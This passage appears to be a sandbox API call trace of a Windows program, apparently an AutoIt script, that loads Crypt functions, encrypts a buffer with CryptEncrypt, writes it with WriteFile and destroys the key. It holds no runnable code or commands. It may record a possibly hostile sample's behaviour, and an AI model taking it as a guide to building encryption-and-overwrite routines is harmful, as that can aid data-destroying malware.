dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0269.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0269.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52000 | out: hHeap=0x970000) returned 1 [0269.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52090 | out: hHeap=0x970000) returned 1 [0269.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0269.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52078 [0269.228] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521b0 [0269.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0269.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0269.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52138 [0269.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521b0 | out: hHeap=0x970000) returned 1 [0269.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52138 | out: hHeap=0x970000) returned 1 [0269.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0269.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0269.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ee0 [0269.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0269.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0269.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52090 [0269.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ee0 | out: hHeap=0x970000) returned 1 [0269.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52090 | out: hHeap=0x970000) returned 1 [0269.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0269.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0269.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52090 [0269.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0269.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0269.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0269.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52090 | out: hHeap=0x970000) returned 1 [0269.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0269.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0269.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521b0 [0269.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0269.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0269.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f40 [0269.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521b0 | out: hHeap=0x970000) returned 1 [0269.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0269.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51f28 [0269.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51f28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0269.230] CryptEncrypt (in: hKey=0xa872d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e558d8*, pdwDataLen=0x8cef60*=0x17c, dwBufLen=0x180 | out: pbData=0x2e558d8*, pdwDataLen=0x8cef60*=0x180) returned 1 [0269.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0269.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0269.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0269.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f70 [0269.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52138 [0269.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0269.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0269.231] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0269.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0269.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0269.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0269.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.231] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.231] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0269.231] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0269.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0269.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0269.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0269.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0269.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0269.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0269.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0269.231] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0269.232] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0269.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0269.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0269.232] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0269.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0269.232] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0269.232] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0269.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0269.232] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0269.232] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0269.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0269.232] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0269.232] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0269.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0269.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0269.233] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0269.233] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0269.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0269.233] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.233] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.233] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0269.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0269.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.233] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0269.233] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.233] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0269.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0269.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0269.234] WriteFile (in: hFile=0x2a0, lpBuffer=0x978328*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x978328*, lpNumberOfBytesWritten=0x8cf5e4*=0x180, lpOverlapped=0x0) returned 1 [0269.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0269.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978328 | out: hHeap=0x970000) returned 1 [0269.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0269.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0269.235] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0269.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0269.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0269.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0269.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0269.235] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0269.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0269.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0269.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0269.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0269.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0269.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0269.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0269.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0269.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0269.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0269.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0269.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0269.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518e0 [0269.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0269.236] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0269.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.236] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0269.236] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.236] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0269.237] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0269.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51cd0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0269.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0269.237] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0269.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0269.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.237] CryptDestroyKey (hKey=0xa872d0) returned 1 [0269.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0269.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0269.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0269.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0269.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0269.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0269.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0269.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0269.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0269.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0269.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0269.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0269.239] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0269.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0269.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0269.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0269.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0269.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0269.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0269.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0269.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0269.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0269.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0269.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0269.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0269.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0269.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0269.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0269.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0269.240] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0269.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0269.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0269.240] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0269.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0269.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0269.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0269.240] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0269.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0269.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 